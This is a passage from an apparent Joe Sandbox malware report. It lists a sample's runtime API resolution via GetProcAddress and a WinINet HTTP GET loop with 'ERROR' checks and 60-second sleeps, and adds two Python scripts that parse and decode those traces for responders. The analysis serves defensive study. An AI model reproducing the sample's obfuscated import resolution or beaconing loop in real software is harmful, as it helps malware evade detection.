                        • 651: 27a4e5-27a510, GetProcAddress * 2 -> 650
                        • 652: 27a612-27a619 -> 654, 655
                        • 653: 27a522-27a60d, GetProcAddress * 10 -> 652
                        • 654: 27a67d-27a684 -> 656, 657
                        • 655: 27a61b-27a678, GetProcAddress * 4 -> 654
                        • 656: 27a686-27a699, GetProcAddress -> 657
                        • 657: 27a69e-27a6a5 -> 658, 659
                        • 658: 27a6a7-27a703, GetProcAddress * 4 -> 659
                        • 659: 27a708-27a709
                        APIs
                        • GetProcAddress.KERNEL32(74DD0000,00E15530), ref: 00279C2D
                        • GetProcAddress.KERNEL32(74DD0000,00E15410), ref: 00279C45
                        • GetProcAddress.KERNEL32(74DD0000,00E29520), ref: 00279C5E
                        • GetProcAddress.KERNEL32(74DD0000,00E29280), ref: 00279C76
                        • GetProcAddress.KERNEL32(74DD0000,00E29250), ref: 00279C8E
                        • GetProcAddress.KERNEL32(74DD0000,00E29298), ref: 00279CA7
                        • GetProcAddress.KERNEL32(74DD0000,00E1BBA0), ref: 00279CBF
                        • GetProcAddress.KERNEL32(74DD0000,00E2CE38), ref: 00279CD7
                        • GetProcAddress.KERNEL32(74DD0000,00E2D060), ref: 00279CF0
                        • GetProcAddress.KERNEL32(74DD0000,00E2CEB0), ref: 00279D08
                        • GetProcAddress.KERNEL32(74DD0000,00E2D048), ref: 00279D20
                        • GetProcAddress.KERNEL32(74DD0000,00E15570), ref: 00279D39
                        • GetProcAddress.KERNEL32(74DD0000,00E15430), ref: 00279D51
                        • GetProcAddress.KERNEL32(74DD0000,00E155F0), ref: 00279D69
                        • GetProcAddress.KERNEL32(74DD0000,00E15210), ref: 00279D82
                        • GetProcAddress.KERNEL32(74DD0000,00E2CF70), ref: 00279D9A
                        • GetProcAddress.KERNEL32(74DD0000,00E2CF40), ref: 00279DB2
                        • GetProcAddress.KERNEL32(74DD0000,00E1BBC8), ref: 00279DCB
                        • GetProcAddress.KERNEL32(74DD0000,00E15310), ref: 00279DE3
                        • GetProcAddress.KERNEL32(74DD0000,00E2CDD8), ref: 00279DFB
                        • GetProcAddress.KERNEL32(74DD0000,00E2D078), ref: 00279E14
                        • GetProcAddress.KERNEL32(74DD0000,00E2CE98), ref: 00279E2C
                        • GetProcAddress.KERNEL32(74DD0000,00E2CEC8), ref: 00279E44
                        • GetProcAddress.KERNEL32(74DD0000,00E15350), ref: 00279E5D
                        • GetProcAddress.KERNEL32(74DD0000,00E2CEE0), ref: 00279E75
                        • GetProcAddress.KERNEL32(74DD0000,00E2CF88), ref: 00279E8D
                        • GetProcAddress.KERNEL32(74DD0000,00E2CDF0), ref: 00279EA6
                        • GetProcAddress.KERNEL32(74DD0000,00E2CE08), ref: 00279EBE
                        • GetProcAddress.KERNEL32(74DD0000,00E2D000), ref: 00279ED6
                        • GetProcAddress.KERNEL32(74DD0000,00E2CEF8), ref: 00279EEF
                        • GetProcAddress.KERNEL32(74DD0000,00E2CFE8), ref: 00279F07
                        • GetProcAddress.KERNEL32(74DD0000,00E2CF10), ref: 00279F1F
                        • GetProcAddress.KERNEL32(74DD0000,00E2D090), ref: 00279F38
                        • GetProcAddress.KERNEL32(74DD0000,00E2A5B0), ref: 00279F50
                        • GetProcAddress.KERNEL32(74DD0000,00E2CE20), ref: 00279F68
                        • GetProcAddress.KERNEL32(74DD0000,00E2CE50), ref: 00279F81
                        • GetProcAddress.KERNEL32(74DD0000,00E154B0), ref: 00279F99
                        • GetProcAddress.KERNEL32(74DD0000,00E2CE68), ref: 00279FB1
                        • GetProcAddress.KERNEL32(74DD0000,00E15270), ref: 00279FCA
                        • GetProcAddress.KERNEL32(74DD0000,00E2CFB8), ref: 00279FE2
                        • GetProcAddress.KERNEL32(74DD0000,00E2CF58), ref: 00279FFA
                        • GetProcAddress.KERNEL32(74DD0000,00E15330), ref: 0027A013
                        • GetProcAddress.KERNEL32(74DD0000,00E15890), ref: 0027A02B
                        • LoadLibraryA.KERNEL32(00E2CDC0,?,00275CA3,00280AEB,?,?,?,?,?,?,?,?,?,?,00280AEA,00280AE3), ref: 0027A03D
                        • LoadLibraryA.KERNEL32(00E2CE80,?,00275CA3,00280AEB,?,?,?,?,?,?,?,?,?,?,00280AEA,00280AE3), ref: 0027A04E
                        • LoadLibraryA.KERNEL32(00E2CF28,?,00275CA3,00280AEB,?,?,?,?,?,?,?,?,?,?,00280AEA,00280AE3), ref: 0027A060
                        • LoadLibraryA.KERNEL32(00E2D018,?,00275CA3,00280AEB,?,?,?,?,?,?,?,?,?,?,00280AEA,00280AE3), ref: 0027A072
                        • LoadLibraryA.KERNEL32(00E2D030,?,00275CA3,00280AEB,?,?,?,?,?,?,?,?,?,?,00280AEA,00280AE3), ref: 0027A083
                        • LoadLibraryA.KERNEL32(00E2CDA8,?,00275CA3,00280AEB,?,?,?,?,?,?,?,?,?,?,00280AEA,00280AE3), ref: 0027A095
                        • LoadLibraryA.KERNEL32(00E2CFA0,?,00275CA3,00280AEB,?,?,?,?,?,?,?,?,?,?,00280AEA,00280AE3), ref: 0027A0A7
                        • LoadLibraryA.KERNEL32(00E2CFD0,?,00275CA3,00280AEB,?,?,?,?,?,?,?,?,?,?,00280AEA,00280AE3), ref: 0027A0B8
                        • GetProcAddress.KERNEL32(75290000,00E15910), ref: 0027A0DA
                        • GetProcAddress.KERNEL32(75290000,00E2D2A0), ref: 0027A0F2
                        • GetProcAddress.KERNEL32(75290000,00E291E0), ref: 0027A10A
                        • GetProcAddress.KERNEL32(75290000,00E2D378), ref: 0027A123
                        • GetProcAddress.KERNEL32(75290000,00E157F0), ref: 0027A13B
                        • GetProcAddress.KERNEL32(6FC70000,00E1B8D0), ref: 0027A160
                        • GetProcAddress.KERNEL32(6FC70000,00E158D0), ref: 0027A179
                        • GetProcAddress.KERNEL32(6FC70000,00E1B998), ref: 0027A191
                        • GetProcAddress.KERNEL32(6FC70000,00E2D318), ref: 0027A1A9
                        • GetProcAddress.KERNEL32(6FC70000,00E2D2D0), ref: 0027A1C2
                        • GetProcAddress.KERNEL32(6FC70000,00E15870), ref: 0027A1DA
                        • GetProcAddress.KERNEL32(6FC70000,00E158B0), ref: 0027A1F2
                        • GetProcAddress.KERNEL32(6FC70000,00E2D1F8), ref: 0027A20B
                        • GetProcAddress.KERNEL32(752C0000,00E15670), ref: 0027A22C
                        • GetProcAddress.KERNEL32(752C0000,00E158F0), ref: 0027A244
                        • GetProcAddress.KERNEL32(752C0000,00E2D2E8), ref: 0027A25D
                        • GetProcAddress.KERNEL32(752C0000,00E2D0D8), ref: 0027A275
                        • GetProcAddress.KERNEL32(752C0000,00E15930), ref: 0027A28D
                        • GetProcAddress.KERNEL32(74EC0000,00E1B948), ref: 0027A2B3
                        • GetProcAddress.KERNEL32(74EC0000,00E1B678), ref: 0027A2CB
                        • GetProcAddress.KERNEL32(74EC0000,00E2D1E0), ref: 0027A2E3
                        • GetProcAddress.KERNEL32(74EC0000,00E15750), ref: 0027A2FC
                        • GetProcAddress.KERNEL32(74EC0000,00E156F0), ref: 0027A314
                        • GetProcAddress.KERNEL32(74EC0000,00E1B790), ref: 0027A32C
                        • GetProcAddress.KERNEL32(75BD0000,00E2D390), ref: 0027A352
                        • GetProcAddress.KERNEL32(75BD0000,00E15770), ref: 0027A36A
                        • GetProcAddress.KERNEL32(75BD0000,00E291F0), ref: 0027A382
                        • GetProcAddress.KERNEL32(75BD0000,00E2D120), ref: 0027A39B
                        • GetProcAddress.KERNEL32(75BD0000,00E2D300), ref: 0027A3B3
                        • GetProcAddress.KERNEL32(75BD0000,00E15730), ref: 0027A3CB
                        • GetProcAddress.KERNEL32(75BD0000,00E15950), ref: 0027A3E4
                        • GetProcAddress.KERNEL32(75BD0000,00E2D330), ref: 0027A3FC
                        • GetProcAddress.KERNEL32(75BD0000,00E2D348), ref: 0027A414
                        • GetProcAddress.KERNEL32(75A70000,00E15970), ref: 0027A436
                        • GetProcAddress.KERNEL32(75A70000,00E2D360), ref: 0027A44E
                        • GetProcAddress.KERNEL32(75A70000,00E2D210), ref: 0027A466
                        • GetProcAddress.KERNEL32(75A70000,00E2D180), ref: 0027A47F
                        • GetProcAddress.KERNEL32(75A70000,00E2D1B0), ref: 0027A497
                        • GetProcAddress.KERNEL32(75450000,00E15990), ref: 0027A4B8
                        • GetProcAddress.KERNEL32(75450000,00E15690), ref: 0027A4D1
                        • GetProcAddress.KERNEL32(75DA0000,00E15610), ref: 0027A4F2
                        • GetProcAddress.KERNEL32(75DA0000,00E2D0A8), ref: 0027A50A
                        • GetProcAddress.KERNEL32(6F070000,00E15790), ref: 0027A530
                        • GetProcAddress.KERNEL32(6F070000,00E159B0), ref: 0027A548
                        • GetProcAddress.KERNEL32(6F070000,00E15630), ref: 0027A560
                        • GetProcAddress.KERNEL32(6F070000,00E2D198), ref: 0027A579
                        • GetProcAddress.KERNEL32(6F070000,00E15810), ref: 0027A591
                        • GetProcAddress.KERNEL32(6F070000,00E156B0), ref: 0027A5A9
                        • GetProcAddress.KERNEL32(6F070000,00E15830), ref: 0027A5C2
                        • GetProcAddress.KERNEL32(6F070000,00E15650), ref: 0027A5DA
                        • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0027A5F1
                        • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0027A607
                        • GetProcAddress.KERNEL32(75AF0000,00E2D168), ref: 0027A629
                        • GetProcAddress.KERNEL32(75AF0000,00E29160), ref: 0027A641
                        • GetProcAddress.KERNEL32(75AF0000,00E2D0C0), ref: 0027A659
                        • GetProcAddress.KERNEL32(75AF0000,00E2D240), ref: 0027A672
                        • GetProcAddress.KERNEL32(75D90000,00E15850), ref: 0027A693
                        • GetProcAddress.KERNEL32(6CFD0000,00E2D1C8), ref: 0027A6B4
                        • GetProcAddress.KERNEL32(6CFD0000,00E156D0), ref: 0027A6CD
                        • GetProcAddress.KERNEL32(6CFD0000,00E2D2B8), ref: 0027A6E5
                        • GetProcAddress.KERNEL32(6CFD0000,00E2D0F0), ref: 0027A6FD
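The list above is the sample's import-resolution routine. One module handle (74DD0000) is queried 43 times before the first LoadLibraryA call, so that module was already loaded when the routine ran (for code that resolves everything through GetProcAddress this is normally kernel32.dll; confirm against the loaded-module list of the same run, since handles are base addresses and differ between runs). Eight LoadLibraryA calls follow, and the remaining handles are queried in groups. Only two lookups pass a literal export name, InternetSetOptionA and HttpQueryInfoA; both are WinINet exports, so 6F070000 is wininet.dll. Every other lookup passes a pointer in the 00E1xxxx to 00E2xxxx range, the same range as the LoadLibraryA name arguments, which is consistent with API names being decoded into heap memory at runtime rather than stored as plaintext imports. The script below is an added example written for this page; it is not part of the Joe Sandbox report and not code from the sample. It parses trace lines in the format printed above (a subset copied from the list is embedded), groups GetProcAddress calls by module handle, and separates pointer-passed names from literal ones.

```python
"""Group Joe Sandbox GetProcAddress/LoadLibraryA trace lines by module handle."""
import re
from collections import defaultdict

# Subset of the API trace lines listed above, copied from the report.
# Columns are as Joe Sandbox printed them; "ref" is the call-site address.
TRACE = """
• GetProcAddress.KERNEL32(74DD0000,00E15530), ref: 00279C2D
• GetProcAddress.KERNEL32(74DD0000,00E15410), ref: 00279C45
• LoadLibraryA.KERNEL32(00E2CDC0,?,00275CA3,00280AEB,?,?,?,?,?,?,?,?,?,?,00280AEA,00280AE3), ref: 0027A03D
• GetProcAddress.KERNEL32(75290000,00E15910), ref: 0027A0DA
• GetProcAddress.KERNEL32(6F070000,00E15790), ref: 0027A530
• GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0027A5F1
• GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0027A607
• GetProcAddress.KERNEL32(6CFD0000,00E2D1C8), ref: 0027A6B4
"""

# "• Api.MODULE(arg,arg,...), ref: XXXXXXXX"
LINE_RE = re.compile(r"^\s*•\s*(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]{8})\s*$")
# An 8-hex-digit argument is a raw pointer; anything else is a literal the tracer could print.
PTR_RE = re.compile(r"^[0-9A-Fa-f]{8}$")


def parse_trace(text):
    """Yield (api, module, args, ref) for every trace line that matches the format."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            api, mod, args, ref = m.groups()
            yield api, mod, args.split(","), ref


def summarize(text):
    """Return ({handle: {"by_pointer": n, "by_name": [names]}}, loadlibrary_count)."""
    per_handle = defaultdict(lambda: {"by_pointer": 0, "by_name": []})
    loadlib = 0
    for api, _mod, args, _ref in parse_trace(text):
        if api == "LoadLibraryA":
            loadlib += 1
        elif api == "GetProcAddress" and len(args) >= 2:
            handle, name = args[0], args[1]
            if PTR_RE.match(name):
                # Name lived only in memory at call time (built/decoded at runtime).
                per_handle[handle]["by_pointer"] += 1
            else:
                # Literal export name survived in the trace.
                per_handle[handle]["by_name"].append(name)
    return dict(per_handle), loadlib


def exporting_module_hints(per_handle):
    """Pin a handle to a DLL when a literal name it resolved has one unambiguous exporter."""
    known = {"InternetSetOptionA": "wininet.dll", "HttpQueryInfoA": "wininet.dll"}
    hints = {}
    for handle, info in per_handle.items():
        for name in info["by_name"]:
            if name in known:
                hints[handle] = known[name]
    return hints


if __name__ == "__main__":
    handles, loadlib = summarize(TRACE)
    print(f"LoadLibraryA calls: {loadlib}")
    for h, info in handles.items():
        print(f"{h}: {info['by_pointer']} by pointer, {len(info['by_name'])} by name {info['by_name']}")
    print("handle -> DLL hints:", exporting_module_hints(handles))
```

Run it over the full list above to get the per-handle counts for all 14 handles; the by-name column stays at two entries, which is the pattern behind the report's "Extensive use of GetProcAddress" and string-decryption signatures.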
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: 0S$0T$0U$0V$0W$0X$0Y$HttpQueryInfoA$InternetSetOptionA$PS$PV$PW$PX$PY$pR$pU$pV$pW$pX$pY
                        • API String ID: 2238633743-3081426368
                        • Opcode ID: c6add33b8a4cb0953905f2816cef1921e34bb5f6397cc63ec7236071e203faca
                        • Instruction ID: 5404ec51843d8dfa0fecc272476dd734d63b68e83e97b86a8417415ef49ee764
                        • Opcode Fuzzy Hash: c6add33b8a4cb0953905f2816cef1921e34bb5f6397cc63ec7236071e203faca
                        • Instruction Fuzzy Hash: 78625FB9500210AFC395EFA8ED889667FF9F78E701704853EA609C3264D739D865CF1A

                        Control-flow Graph
                        control_flow_graph 1033 266280-26630b call 27a7a0 call 2647b0 call 27a740 InternetOpenA StrCmpCA 1040 266314-266318 1033->1040 1041 26630d 1033->1041 1042 26631e-266342 InternetConnectA 1040->1042 1043 266509-266525 call 27a7a0 call 27a800 * 2 1040->1043 1041->1040 1045 2664ff-266503 InternetCloseHandle 1042->1045 1046 266348-26634c 1042->1046 1062 266528-26652d 1043->1062 1045->1043 1047 26634e-266358 1046->1047 1048 26635a 1046->1048 1050 266364-266392 HttpOpenRequestA 1047->1050 1048->1050 1052 2664f5-2664f9 InternetCloseHandle 1050->1052 1053 266398-26639c 1050->1053 1052->1045 1055 2663c5-266405 HttpSendRequestA HttpQueryInfoA 1053->1055 1056 26639e-2663bf InternetSetOptionA 1053->1056 1058 266407-266427 call 27a740 call 27a800 * 2 1055->1058 1059 26642c-26644b call 278940 1055->1059 1056->1055 1058->1062 1066 26644d-266454 1059->1066 1067 2664c9-2664e9 call 27a740 call 27a800 * 2 1059->1067 1069 266456-266480 InternetReadFile 1066->1069 1070 2664c7-2664ef InternetCloseHandle 1066->1070 1067->1062 1073 266482-266489 1069->1073 1074 26648b 1069->1074 1070->1052 1073->1074 1078 26648d-2664c5 call 27a9b0 call 27a8a0 call 27a800 1073->1078 1074->1070 1078->1069
                        APIs
                          • Part of subcall function 0027A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0027A7E6
                          • Part of subcall function 002647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00264839
                          • Part of subcall function 002647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00264849
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                        • InternetOpenA.WININET(00280DFE,00000001,00000000,00000000,00000000), ref: 002662E1
                        • StrCmpCA.SHLWAPI(?,00E2EA78), ref: 00266303
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00266335
                        • HttpOpenRequestA.WININET(00000000,GET,?,00E2DE60,00000000,00000000,00400100,00000000), ref: 00266385
                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 002663BF
                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002663D1
                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 002663FD
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0026646D
                        • InternetCloseHandle.WININET(00000000), ref: 002664EF
                        • InternetCloseHandle.WININET(00000000), ref: 002664F9
                        • InternetCloseHandle.WININET(00000000), ref: 00266503
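Decoding the numeric arguments in the list above gives the shape of the fetch: InternetOpenA with access type 1 (INTERNET_OPEN_TYPE_DIRECT, no proxy lookup), InternetConnectA with service 3 (INTERNET_SERVICE_HTTP), HttpOpenRequestA for a GET with flags 0x00400100 (INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_PRAGMA_NOCACHE; INTERNET_FLAG_SECURE is not set), InternetSetOptionA with option 0x1F (INTERNET_OPTION_SECURITY_FLAGS, a 4-byte value the trace does not print), HttpQueryInfoA with level 0x13 (HTTP_QUERY_STATUS_CODE, returned as a string because HTTP_QUERY_FLAG_NUMBER is not set) into a 0x100-byte buffer, and InternetReadFile in 0x7CF (1999) byte chunks inside the loop the control-flow graph shows between 266456 and 2664c5. The StrCmpCA against "ERROR" and the three InternetCloseHandle calls are the response check and cleanup; the caller at 275510 repeats its own "ERROR" comparisons and sleeps 0xEA60 ms (60 seconds) before looping back. The decoder below is an added example written for this page, not report or sample code; it carries the wininet.h constant values inline and embeds the six lines copied from above, leaving "?" arguments (values the tracer could not print) undecoded.

```python
"""Decode the numeric arguments of the WinINet calls in a Joe Sandbox API trace."""
import re

# Lines copied from the API list above. "?" marks arguments Joe Sandbox could not print.
TRACE = """
• InternetOpenA.WININET(00280DFE,00000001,00000000,00000000,00000000), ref: 002662E1
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00266335
• HttpOpenRequestA.WININET(00000000,GET,?,00E2DE60,00000000,00000000,00400100,00000000), ref: 00266385
• InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 002663BF
• HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 002663FD
• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0026646D
"""

# Constant values from wininet.h.
OPEN_TYPE = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT", 3: "INTERNET_OPEN_TYPE_PROXY"}
SERVICE = {1: "INTERNET_SERVICE_FTP", 2: "INTERNET_SERVICE_GOPHER", 3: "INTERNET_SERVICE_HTTP"}
REQUEST_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT",
    0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000200: "INTERNET_FLAG_NO_UI",
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}
OPTIONS = {31: "INTERNET_OPTION_SECURITY_FLAGS"}
QUERY_INFO = {19: "HTTP_QUERY_STATUS_CODE"}
HTTP_QUERY_FLAG_NUMBER = 0x20000000
INTERNET_FLAG_SECURE = 0x00800000

LINE_RE = re.compile(r"^\s*•\s*(\w+)\.\w+\((.*)\),\s*ref:\s*[0-9A-Fa-f]{8}\s*$")


def arg(args, i):
    """Integer value of argument i, or None when the trace shows '?' or a non-numeric literal."""
    try:
        return int(args[i], 16)
    except ValueError:
        return None


def decode_flags(value, table):
    """Names of the flag bits set in value; unnamed bits are kept as a hex remainder."""
    names = [name for bit, name in table.items() if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append(f"0x{rest:08X}")
    return names


def decode_call(api, args):
    """Decoded, security-relevant arguments for one WinINet call (by parameter position)."""
    if api == "InternetOpenA":
        t = arg(args, 1)
        return {"dwAccessType": OPEN_TYPE.get(t, t)}
    if api == "InternetConnectA":
        s = arg(args, 5)
        return {"nService": SERVICE.get(s, s)}
    if api == "HttpOpenRequestA":
        flags = arg(args, 6)
        return {"lpszVerb": args[1], "dwFlags": decode_flags(flags, REQUEST_FLAGS),
                "secure": bool(flags & INTERNET_FLAG_SECURE)}
    if api == "InternetSetOptionA":
        o = arg(args, 1)
        return {"dwOption": OPTIONS.get(o, o), "dwBufferLength": arg(args, 3)}
    if api == "HttpQueryInfoA":
        level = arg(args, 1)
        base = level & ~HTTP_QUERY_FLAG_NUMBER
        return {"dwInfoLevel": QUERY_INFO.get(base, base),
                "as_number": bool(level & HTTP_QUERY_FLAG_NUMBER),
                "buffer_length_shown": arg(args, 3)}
    if api == "InternetReadFile":
        return {"dwNumberOfBytesToRead": arg(args, 2)}
    return {}


def decode_trace(text):
    """Map each API name in the trace to its decoded arguments."""
    out = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            api, args = m.group(1), m.group(2).split(",")
            out[api] = decode_call(api, args)
    return out


if __name__ == "__main__":
    for api, info in decode_trace(TRACE).items():
        print(f"{api}: {info}")
```

The two facts a responder wants from this are the ones the decoder surfaces: the request is built without INTERNET_FLAG_SECURE, and the status code is read back as a string and compared (the StrCmpCA calls) rather than as a number.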
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                        • String ID: ERROR$ERROR$GET$x
                        • API String ID: 3749127164-2392039165
                        • Opcode ID: b0944e53030d94712f020ccf00c3e1e780d5e389d4e2bba2394d40ec2fe21e5a
                        • Instruction ID: b6021b80f466d8cef84b9da64304bd8283c78d468f7a9a184729b964dd537bb9
                        • Opcode Fuzzy Hash: b0944e53030d94712f020ccf00c3e1e780d5e389d4e2bba2394d40ec2fe21e5a
                        • Instruction Fuzzy Hash: 09713275A20218EBDB24DFA0DC49BEEB778FB45700F108198F50A6B1D0DBB46A95CF52

                        Control-flow Graph
                        control_flow_graph 1090 275510-275577 call 275ad0 call 27a820 * 3 call 27a740 * 4 1106 27557c-275583 1090->1106 1107 2755d7-27564c call 27a740 * 2 call 261590 call 2752c0 call 27a8a0 call 27a800 call 27aad0 StrCmpCA 1106->1107 1108 275585-2755b6 call 27a820 call 27a7a0 call 261590 call 2751f0 1106->1108 1133 275693-2756a9 call 27aad0 StrCmpCA 1107->1133 1138 27564e-27568e call 27a7a0 call 261590 call 2751f0 call 27a8a0 call 27a800 1107->1138 1124 2755bb-2755d2 call 27a8a0 call 27a800 1108->1124 1124->1133 1140 2756af-2756b6 1133->1140 1141 2757dc-275844 call 27a8a0 call 27a820 * 2 call 261670 call 27a800 * 4 call 276560 call 261550 1133->1141 1138->1133 1144 2756bc-2756c3 1140->1144 1145 2757da-27585f call 27aad0 StrCmpCA 1140->1145 1270 275ac3-275ac6 1141->1270 1149 2756c5-275719 call 27a820 call 27a7a0 call 261590 call 2751f0 call 27a8a0 call 27a800 1144->1149 1150 27571e-275793 call 27a740 * 2 call 261590 call 2752c0 call 27a8a0 call 27a800 call 27aad0 StrCmpCA 1144->1150 1164 275865-27586c 1145->1164 1165 275991-2759f9 call 27a8a0 call 27a820 * 2 call 261670 call 27a800 * 4 call 276560 call 261550 1145->1165 1149->1145 1150->1145 1250 275795-2757d5 call 27a7a0 call 261590 call 2751f0 call 27a8a0 call 27a800 1150->1250 1171 275872-275879 1164->1171 1172 27598f-275a14 call 27aad0 StrCmpCA 1164->1172 1165->1270 1180 2758d3-275948 call 27a740 * 2 call 261590 call 2752c0 call 27a8a0 call 27a800 call 27aad0 StrCmpCA 1171->1180 1181 27587b-2758ce call 27a820 call 27a7a0 call 261590 call 2751f0 call 27a8a0 call 27a800 1171->1181 1201 275a16-275a21 Sleep 1172->1201 1202 275a28-275a91 call 27a8a0 call 27a820 * 2 call 261670 call 27a800 * 4 call 276560 call 261550 1172->1202 1180->1172 1275 27594a-27598a call 27a7a0 call 261590 call 2751f0 call 27a8a0 call 27a800 1180->1275 1181->1172 1201->1106 1202->1270 1250->1145 1275->1172
                        APIs
                          • Part of subcall function 0027A820: lstrlen.KERNEL32(00264F05,?,?,00264F05,00280DDE), ref: 0027A82B
                          • Part of subcall function 0027A820: lstrcpy.KERNEL32(00280DDE,00000000), ref: 0027A885
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00275644
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 002756A1
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00275857
                          • Part of subcall function 0027A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0027A7E6
                          • Part of subcall function 002751F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00275228
                          • Part of subcall function 0027A8A0: lstrcpy.KERNEL32(?,00280E17), ref: 0027A905
                          • Part of subcall function 002752C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00275318
                          • Part of subcall function 002752C0: lstrlen.KERNEL32(00000000), ref: 0027532F
                          • Part of subcall function 002752C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00275364
                          • Part of subcall function 002752C0: lstrlen.KERNEL32(00000000), ref: 00275383
                          • Part of subcall function 002752C0: lstrlen.KERNEL32(00000000), ref: 002753AE
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0027578B
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00275940
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00275A0C
                        • Sleep.KERNEL32(0000EA60), ref: 00275A1B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
